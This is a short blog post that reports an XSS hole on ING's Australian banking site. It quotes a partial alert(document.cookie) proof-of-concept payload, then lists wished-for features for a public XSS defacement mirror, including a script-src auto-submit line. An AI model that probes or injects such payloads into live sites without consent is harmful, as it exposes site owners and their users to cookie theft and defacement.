I found a XSS vulnerability in ING's australian website; ING - XSS - PoC.jpg
The proof of concept url used to illustrate the vulnerability is:;alert(document.cookie);test=%27

XSS defacement mirror

Since appears to be out of action there seems to be a need for an active xss defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on or However these two sites don't offer the ease of use that did with reporting xss.

If cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit post and cookie data or even tamper data xml
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that needs to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.